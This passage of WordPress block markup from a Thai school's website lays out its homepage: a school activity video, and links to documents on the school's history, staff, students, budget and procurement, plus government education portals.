{\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" 